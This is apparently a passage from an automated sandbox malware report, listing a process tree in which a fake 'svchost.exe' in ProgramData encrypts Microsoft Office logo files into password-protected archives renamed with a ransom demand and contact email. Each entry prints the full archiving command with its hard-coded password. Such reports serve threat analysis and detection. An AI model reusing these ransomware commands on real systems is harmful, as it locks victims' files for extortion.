  2⤵
  - Drops file in Program Files directory
  PID:3572
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogo.contrast-black_scale-140.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogo.contrast-black_scale-140.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:1444
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogo.contrast-black_scale-180.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogo.contrast-black_scale-180.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:464
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogo.contrast-black_scale-80.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogo.contrast-black_scale-80.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  PID:5288
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogo.contrast-white_scale-100.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogo.contrast-white_scale-100.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:672
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogo.contrast-white_scale-140.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogo.contrast-white_scale-140.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:4104
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogo.contrast-white_scale-180.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogo.contrast-white_scale-180.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2444
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogo.contrast-white_scale-80.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogo.contrast-white_scale-80.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5032
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogo.scale-100.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogo.scale-100.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:3892
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogo.scale-140.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogo.scale-140.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:1856
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogo.scale-180.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogo.scale-180.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  PID:2884
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogo.scale-80.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogo.scale-80.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5304
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogoSmall.contrast-black_scale-100.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogoSmall.contrast-black_scale-100.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5780
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogoSmall.contrast-black_scale-140.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogoSmall.contrast-black_scale-140.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:2548
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogoSmall.contrast-black_scale-180.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogoSmall.contrast-black_scale-180.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:2716
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogoSmall.contrast-black_scale-80.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogoSmall.contrast-black_scale-80.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4348
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogoSmall.contrast-white_scale-100.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogoSmall.contrast-white_scale-100.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1684
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogoSmall.contrast-white_scale-140.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogoSmall.contrast-white_scale-140.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:3848
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogoSmall.contrast-white_scale-180.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogoSmall.contrast-white_scale-180.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:5376
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogoSmall.contrast-white_scale-80.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogoSmall.contrast-white_scale-80.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:3728
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogoSmall.scale-100.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogoSmall.scale-100.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1572
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogoSmall.scale-140.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogoSmall.scale-140.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:4760
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogoSmall.scale-180.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogoSmall.scale-180.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5988
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogoSmall.scale-80.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogoSmall.scale-80.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:720
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogo.contrast-black_scale-100.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogo.contrast-black_scale-100.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4208
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogo.contrast-black_scale-140.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogo.contrast-black_scale-140.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:432
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogo.contrast-black_scale-180.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogo.contrast-black_scale-180.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:2476
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogo.contrast-black_scale-80.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogo.contrast-black_scale-80.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:3744
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogo.contrast-white_scale-100.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogo.contrast-white_scale-100.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:3864
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogo.contrast-white_scale-140.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogo.contrast-white_scale-140.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:4868
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogo.contrast-white_scale-180.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogo.contrast-white_scale-180.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:2912
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogo.contrast-white_scale-80.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogo.contrast-white_scale-80.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:4552
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogo.scale-100.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogo.scale-100.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4976
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogo.scale-140.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogo.scale-140.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:2672
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogo.scale-180.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogo.scale-180.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4120
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogo.scale-80.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogo.scale-80.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:3604
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogoSmall.contrast-black_scale-100.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogoSmall.contrast-black_scale-100.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:1484
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogoSmall.contrast-black_scale-140.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogoSmall.contrast-black_scale-140.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2468
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogoSmall.contrast-black_scale-180.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogoSmall.contrast-black_scale-180.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3584
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogoSmall.contrast-black_scale-80.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogoSmall.contrast-black_scale-80.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4988
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogoSmall.contrast-white_scale-100.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogoSmall.contrast-white_scale-100.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2128
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogoSmall.contrast-white_scale-140.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogoSmall.contrast-white_scale-140.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:6008
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogoSmall.contrast-white_scale-180.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogoSmall.contrast-white_scale-180.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4368
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogoSmall.contrast-white_scale-80.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogoSmall.contrast-white_scale-80.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:932
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogoSmall.scale-100.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogoSmall.scale-100.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:552
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogoSmall.scale-140.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogoSmall.scale-140.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:1088
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogoSmall.scale-180.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogoSmall.scale-180.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:4744
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogoSmall.scale-80.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogoSmall.scale-80.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5832
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.contrast-black_scale-100.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.contrast-black_scale-100.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5596
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.contrast-black_scale-140.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.contrast-black_scale-140.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3512
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.contrast-black_scale-180.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.contrast-black_scale-180.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4964
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.contrast-black_scale-80.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.contrast-black_scale-80.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:3632
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.contrast-white_scale-100.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.contrast-white_scale-100.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:3212
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.contrast-white_scale-140.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.contrast-white_scale-140.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5688
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.contrast-white_scale-180.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.contrast-white_scale-180.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:6036
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.contrast-white_scale-80.png(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.contrast-white_scale-80.png" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
